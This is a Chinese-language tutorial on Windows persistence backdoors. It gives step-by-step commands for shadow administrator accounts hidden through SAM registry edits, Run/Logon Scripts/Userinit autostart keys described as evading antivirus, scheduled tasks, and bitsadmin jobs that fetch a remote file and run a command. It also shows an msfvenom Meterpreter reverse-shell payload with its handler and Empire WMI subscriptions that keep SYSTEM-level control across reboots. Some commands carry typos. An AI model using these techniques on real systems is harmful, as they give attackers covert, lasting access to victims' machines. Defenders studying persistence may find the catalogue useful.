windows操作系统后门

1. 影子账户
   1. 　　创建隐藏账户的方式：
      1. 创建一个隐藏账户"net user test$ password /add"，隐藏账户无法使用"net user"命令查看，但是可以在"本地用户和组"里面查看。
      2. 打开注册表"HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names"找到创建的隐藏账户（test$）,在这个注册表里面可以看见test$账户的类型，同样可以查看计算机Administrator账户的类型
      3. 回退注册表"HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names"到上一级"HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/"，找到Administrator对应目录000001FA，双击"F"复制里面的值，然后找到test$账户对应的目录000003EC，双击"F"后把刚才复制的值粘贴进去，
      4. 在注册表中导出"HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names"下的test$和"HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/"下的000003EC，然后在命令行中运行命令"net user test$ /del"删除test$用户。
      5. 导入上一步导出的两个注册表文件，就可以创建影子账户test$，该账户只有在注册表中才能看到。
2. 注册表后门
   1. 　　Run注册表后门
      1. HKEY_LOCAL_MACHINE\SOFTWARE|Microsoft\Windows\CurrentVersion\Run下的键值即为开机启动项，每一次开机都会执行对应的程序或bat脚本。
   2. 　　Logon Scripts后门
      1. Logon Scripts是优先于很多杀毒软件启动的，所以可以通过这种方式达到一定的免杀效果，HKEY_CURRENT_USER/Enviroment下新建字符串值UserInitMprLogonScript，值设为想要执行的程序或bat脚本的路径，修改后注销重新登录后执行脚本。
   3. 　　Userinit注册表后门
      1. Userinit的作用是用户在进行登录初始化的设置时，会执行指定的程序，可以修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\winlogon\Userinit的键值来添加要执行的程序，多个程序用逗号隔开，注销登录后执行。
3. 计划任务后门
   1. 　　windows实现定时任务主要有schtasks与at两种方式，均可用于计划在某个日期和时间执行程序和脚本，其中at命令在win8之后不在支持。
      1. schtasks命令，创建一个名为test的计划任务每天12:00执行test.bat脚本。(schtasks /creat /tn test /sc DAILY /st 12:00 /tr C:\test.bat /F)
      2. at命令，创建一个周一到周五12:00执行的test.bat的计划任务，（at 12:00/every:Monday,Tuesday,Wednesday,Thursday,Firday c:\test.bat）
4. Bitsadmin后门
   1. 　　Bitsadmin后台智能传输服务，是一个windows组件，从win7之后操作系统默认自带，它可以利用空闲的带宽在前台或后台异步传输文件，并支持在重新启动计算机或重新连接网络后自动回复文件传输，常用于WindowsUpdate的安装更新，攻击者可以利用它的特性在被控制的计算机上面持久运行。
      1. bitsadmin /creat [type] DisplayName 创建一个任务
      2. bitsadmin /cancel <job> 删除一个任务
      3. ditsadmin /complete <job> 完成某个任务
      4. ditsadmin /Resume <job> 激活传输队列中的新任务或挂起的任务
      5. bitsadmin /list /allusers /verbase 列出所有任务
      6. bitsadmin /reset /allusers 删除所有任务
      7. bitsadmin /Addfile <job> <RemoteURL> <localName> 给任务添加下载文件
      8. bitsadmin /SetNotifyCmdLine <job> <ProgramName> [ProgramParameters] 设置在任务完成传输
   2.        bitsadmin 后门创建
      1. 创建任务名为：test
         1. bitsadmin /create test
      2. 远程文件下载到本地
         1. bitsadmin /addfile test http://ip/test.txt "c:\test.txt"
      3. 文件下载完成执行命令
         1. bitsadmin /SetNotifyCmdLine test "%COMSPEC%" "cmd.exe /c calc.exe"
      4. 执行任务
         1. bitsadmin /resume test
      5. 完成任务
         1. bitsadmin /complete test
      6. 如果没有执行"bitsadmin /complete test"命令，即使重启系统任务依然存在，重启后等待几秒后还会执行。
5. MSF后门模块
   1. 　　MSF留后门的两种方式：
      1. Metsvc：通过服务启动，会在目标主机上以Meterpreter的服务的形式注册在服务列表中，并开机自动启动。
      2. Persistence：通过启动项启动，在目标机器上以反弹回连方式来连接服务器。
   2. 　　首先获取Meterpreter shell,使用Msfvenom生成反弹shell 木马，然后在目标机器上执行木马程序后去shell。
      1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=1234 -f exe >/tmp/shell.exe
      2. msf6>use exploit/multi/handler
      3. msf6>set payload windows/metsvc_bind_tcp 
      4. msf6>set lport 31337
      5. msf6>set rhost 192.168.1.103
      6. msf6>run
6. WMI型后门
   1. 　　wmic startup list full 自启动的程序
   2. 　　wmic process call create "calc.exe" 在当前机器中执行指定程序
   3. 　　wmic process where(description="rundll32.exe")查看rundll32所加载的dll
   4.        wmic cpu get DataWidth /format:list 查询当前机器的操作系统位数
   5.        WMI的事件分两类：
      1. 本地事件：有生命周期，为进程宿主的周期
      2. 永久性WMI事件订阅：存储在WMI库中，以SYSTEM权限运行，并且重启后依然存在
      3. 使用Empire的wmi模块之前，需要使用Empire获取目标主机shell，使用Empire创建名为test的监听并生成powershell代码
      4. 在目标主机上执行powershell代码之后，在agents功能模块下可以看到上线的主机。
      5. 使用powershell/persistence/elevated/wmi模块来创建一个永久的WMI订阅，能够持久化控制目标主机
      6. 在目标主机创建了永久订阅后，即使重启也会重新获取目标主机的权限。并且是SYSTEM权限